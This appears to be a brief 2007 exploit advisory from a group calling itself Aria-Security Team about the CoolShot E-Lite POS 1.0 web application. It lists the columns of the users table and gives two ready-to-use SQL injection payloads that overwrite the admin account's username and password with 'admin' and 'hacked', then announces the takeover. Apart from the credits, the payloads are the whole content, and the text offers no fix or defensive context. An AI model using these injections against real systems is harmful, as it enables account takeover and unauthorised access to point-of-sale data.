Aria-Security Team http://aria-security.net ------------------------------------- CoolShot E-Lite POS 1.0 http://coolshot.net/index.php/works/49-e-lite-pos Original Advisory @ http://aria-security.net/forum/showthread.php?p=1108#post1108 Published on November 24 2007 users.user_id users.user_name users.user_email users.user_admin users.user_auth users.user_pw use these two queries -1' UPDATE users set user_name= 'admin' Where(user_iD= '1');-- -1' UPDATE users set user_pw= 'hacked' Where(user_iD= '1');-- there you go with the user admin and password hacked. Credits Goes to Aria-Security Team A SPECIAL THANKS TO: AurA Regards, The-0utl4w
